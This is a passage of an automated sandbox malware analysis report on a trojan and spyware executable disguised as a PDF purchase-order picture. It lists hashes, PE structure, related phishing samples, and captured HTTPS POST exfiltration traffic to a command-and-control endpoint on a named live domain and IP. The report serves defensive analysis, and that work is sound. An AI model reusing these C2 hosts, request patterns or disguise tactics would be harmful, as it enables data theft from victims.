                        https://api.ipify.org%#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916704934.0000000002DFB000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://OcJtmX.com#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        104.223.93.105
                        mgbless.inUnited States
                        8100ASN-QUADRANET-GLOBALUStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:528513
                        Start date:25.11.2021
                        Start time:12:18:17
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 38s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:17
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@5/1@6/2
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        12:19:06API Interceptor736x Sleep call for process: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        104.223.93.105Trasferimento.vbsGet hashmaliciousBrowse
                        • nofearsw.in/cgi-sys/suspendedpage.cgi
                        EL1aBD5Zqr.exeGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        TnUFqujldH.exeGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        20210711494754.vbsGet hashmaliciousBrowse
                        • nofearsw.in/fen/inc/9fa099d0b6dea5.php
                        msg001.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        Chuyen giao,pdf.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        Dekont.vbsGet hashmaliciousBrowse
                        • nofearsw.in/swo/inc/11828554f46a7d.php
                        3Bws6ne7Ye.exeGet hashmaliciousBrowse
                        • jlpack.email/file/Panel/five/fre.php
                        filDHjBKef.exeGet hashmaliciousBrowse
                        • jlpack.email/grace/Panel/five/fre.php

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        ASN-QUADRANET-GLOBALUSDHL_119040 ontvangstbewijs,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Waldo Orden de Compra -SA112421,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        NEW PURCHASE ORDER,PDF.EXEGet hashmaliciousBrowse
                        • 104.223.93.105
                        Bestellung -SA95648,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        K7hNSg5hRL.exeGet hashmaliciousBrowse
                        • 185.121.152.212
                        jwviEiXH9lGet hashmaliciousBrowse
                        • 45.199.228.229
                        6PZ6S2YGPBGet hashmaliciousBrowse
                        • 45.199.228.221
                        DHLEXpress is sending Pre-Alert1.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Shipment_21HT42223.exeGet hashmaliciousBrowse
                        • 192.161.187.200
                        Nueva orden de compra,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        1E2503A0E84D330CB00DC6C883A889856DD3F4D849295.exeGet hashmaliciousBrowse
                        • 192.161.187.200
                        Orden de Compra -SA95680.pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 #U0930#U0938#U0940#U0926 #U0926#U0938#U094d#U0924#U093e#U0935#U0947#U091c,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 kvittodokument,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL Receipt Document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_1190323 receipt document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Orden de Compra -SA95647, pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 kvittodokument,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Beckhoff Inkooporder -SA95648,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eDHL_119040 ontvangstbewijs,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        ORDER #63457-BLS.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        TmVqivwYxc.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        g3g1VECs9K.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        SecuriteInfo.com.ArtemisEC35A67F3663.5978.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Purchase Order.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Waldo Orden de Compra -SA112421,pdf.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        PROPOSAL CATALOG.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        LNdP6FAphu.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        Zkb2VENJ38.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        ORDER 759325.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        pH7pQDWJPP.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        oZPv3ngzrx.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        a.dllGet hashmaliciousBrowse
                        • 104.223.93.105
                        NEW PURCHASE ORDER,PDF.EXEGet hashmaliciousBrowse
                        • 104.223.93.105
                        qG92QcOmb4.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        CheatValorant2.2.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        New Order.exeGet hashmaliciousBrowse
                        • 104.223.93.105
                        gm8n7Rb1Jm.exeGet hashmaliciousBrowse
                        • 104.223.93.105

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.log
                        Process:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):2239
                        Entropy (8bit):5.354287817410997
                        Encrypted:false
                        SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                        MD5:913D1EEA179415C6D08FB255AE42B99D
                        SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                        SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                        SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.848029031113809
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        File size:526848
                        MD5:7fb080a6aa45b1ac87c003e3f84a2983
                        SHA1:fa4a0744b0b1282e3f3c167773abcd50e806c133
                        SHA256:a1e613cf9bd9b9afbd51f0c2173cb71ddfdfecdc480b4dc8fc7571a41c90100d
                        SHA512:36494dc795e23f8dd47229560f1d44010b96eb49b6326ba0cd532952e0cd532c5064ebe1b912599047d09710f91096ac729fbc76f9f0a2f0191b8ec8862c42c6
                        SSDEEP:12288:bRf70CixBFmuFM28wYADyZALQI5OX2lKsPpWscuo17Z:p70Ci1LB7vuGLQI5FlKshWhL17
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."@.a..............0......L......>.... ........@.. .......................`............@................................

                        File Icon

                        Icon Hash:00116848084a4400

                        Static PE Info

                        General

                        Entrypoint:0x47da3e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x619F4022 [Thu Nov 25 07:49:54 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [ebp+0800000Eh], ch
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7d9ec0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x4884.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x7ba540x7bc00False0.898822206439data7.8848412694IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x7e0000x48840x4a00False0.307326858108data4.46943114905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x840000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x7e1300x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294835709, next used block 4294835709
                        RT_GROUP_ICON0x823580x14data
                        RT_VERSION0x8236c0x32cdata
                        RT_MANIFEST0x826980x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright Rogers Peet
                        Assembly Version8.0.6.0
                        InternalNameDebugg.exe
                        FileVersion5.6.0.0
                        CompanyNameRogers Peet
                        LegalTrademarks
                        Comments
                        ProductNameBiblan
                        ProductVersion5.6.0.0
                        FileDescriptionBiblan
                        OriginalFilenameDebugg.exe

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 12:19:36.269438982 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.269485950 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.269921064 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.353872061 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.353904009 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.646593094 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.646724939 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.650023937 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:36.650041103 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.650701046 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:36.704797029 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:37.819531918 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:37.860888004 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:37.955518961 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:37.956409931 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:37.956438065 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:38.272676945 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:38.282557011 CET44349779104.223.93.105192.168.2.4
                        Nov 25, 2021 12:19:38.282646894 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:19:38.285159111 CET49779443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.130759001 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.130819082 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.130971909 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.132364988 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.132390022 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.380743027 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.428831100 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.501010895 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.501036882 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.625304937 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.627954960 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.627993107 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.865533113 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.870393038 CET44349843104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:39.870578051 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:39.871617079 CET49843443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.616663933 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.616714001 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:52.616851091 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.617897987 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.617925882 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:52.871803999 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:52.874592066 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:52.874634981 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.121897936 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.122678041 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:53.122716904 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.593717098 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.604995012 CET44349846104.223.93.105192.168.2.4
                        Nov 25, 2021 12:20:53.605176926 CET49846443192.168.2.4104.223.93.105
                        Nov 25, 2021 12:20:53.605667114 CET49846443192.168.2.4104.223.93.105

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 12:19:35.247980118 CET5802853192.168.2.48.8.8.8
                        Nov 25, 2021 12:19:35.521053076 CET53580288.8.8.8192.168.2.4
                        Nov 25, 2021 12:19:36.111958981 CET5309753192.168.2.48.8.8.8
                        Nov 25, 2021 12:19:36.132966042 CET53530978.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:38.654822111 CET5653453192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:38.811353922 CET53565348.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:39.090369940 CET5662753192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:39.128166914 CET53566278.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:52.287245989 CET6311653192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:52.576457977 CET53631168.8.8.8192.168.2.4
                        Nov 25, 2021 12:20:52.593071938 CET6407853192.168.2.48.8.8.8
                        Nov 25, 2021 12:20:52.613585949 CET53640788.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Nov 25, 2021 12:19:35.247980118 CET192.168.2.48.8.8.80x75dfStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:19:36.111958981 CET192.168.2.48.8.8.80x36f6Standard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:38.654822111 CET192.168.2.48.8.8.80x3f0fStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:39.090369940 CET192.168.2.48.8.8.80x33adStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.287245989 CET192.168.2.48.8.8.80xc85Standard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.593071938 CET192.168.2.48.8.8.80x554cStandard query (0)www.mgbless.inA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Nov 25, 2021 12:19:35.521053076 CET8.8.8.8192.168.2.40x75dfNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:19:35.521053076 CET8.8.8.8192.168.2.40x75dfNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:19:36.132966042 CET8.8.8.8192.168.2.40x36f6No error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:19:36.132966042 CET8.8.8.8192.168.2.40x36f6No error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:38.811353922 CET8.8.8.8192.168.2.40x3f0fNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:38.811353922 CET8.8.8.8192.168.2.40x3f0fNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:39.128166914 CET8.8.8.8192.168.2.40x33adNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:39.128166914 CET8.8.8.8192.168.2.40x33adNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.576457977 CET8.8.8.8192.168.2.40xc85No error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:52.576457977 CET8.8.8.8192.168.2.40xc85No error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 12:20:52.613585949 CET8.8.8.8192.168.2.40x554cNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 12:20:52.613585949 CET8.8.8.8192.168.2.40x554cNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.mgbless.in

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.449779104.223.93.105443C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 11:19:37 UTC0OUTPOST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 366
                        Expect: 100-continue
                        Connection: Keep-Alive
                        2021-11-25 11:19:37 UTC0INHTTP/1.1 100 Continue
                        2021-11-25 11:19:37 UTC0OUTData Raw: 70 3d 76 71 62 7a 34 79 4b 6c 46 48 79 76 59 6d 2f 70 71 4f 78 62 70 68 66 41 45 56 53 7a 31 54 45 6a 70 43 49 4f 74 30 48 72 7a 35 42 4f 38 30 36 79 41 6f 64 6d 6c 30 75 69 31 53 78 74 59 49 6a 68 59 51 6d 2f 4a 47 58 39 2f 34 30 53 41 35 66 38 6a 62 45 64 75 62 33 30 6c 7a 61 5a 6a 45 37 7a 67 47 6b 25 32 42 4a 36 6e 78 33 35 51 52 64 79 57 55 53 37 6a 76 4f 55 56 64 58 6c 4a 4d 5a 36 51 30 73 63 4d 4c 4b 31 33 61 30 63 32 32 67 46 47 37 2f 4a 73 76 57 67 6c 4f 31 2f 76 49 6d 63 4a 61 4d 77 47 39 53 54 45 71 65 63 70 50 76 57 59 70 37 6e 25 32 42 71 73 36 68 52 70 4e 54 63 45 7a 66 71 79 30 5a 25 32 42 68 66 42 34 48 4b 6a 25 32 42 34 38 25 32 42 66 71 48 4d 71 69 5a 67 64 55 5a 42 53 72 36 7a 66 55 78 54 43 4f 4b 58 77 39 45 31 6b 67 77 62 56 42 54 2f
                        Data Ascii: p=vqbz4yKlFHyvYm/pqOxbphfAEVSz1TEjpCIOt0Hrz5BO806yAodml0ui1SxtYIjhYQm/JGX9/40SA5f8jbEdub30lzaZjE7zgGk%2BJ6nx35QRdyWUS7jvOUVdXlJMZ6Q0scMLK13a0c22gFG7/JsvWglO1/vImcJaMwG9STEqecpPvWYp7n%2Bqs6hRpNTcEzfqy0Z%2BhfB4HKj%2B48%2BfqHMqiZgdUZBSr6zfUxTCOKXw9E1kgwbVBT/
                        2021-11-25 11:19:38 UTC0INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 11:19:37 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2021-11-25 11:19:38 UTC0INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.449843104.223.93.105443C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 11:20:39 UTC0OUTPOST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 362
                        Expect: 100-continue
                        2021-11-25 11:20:39 UTC1INHTTP/1.1 100 Continue
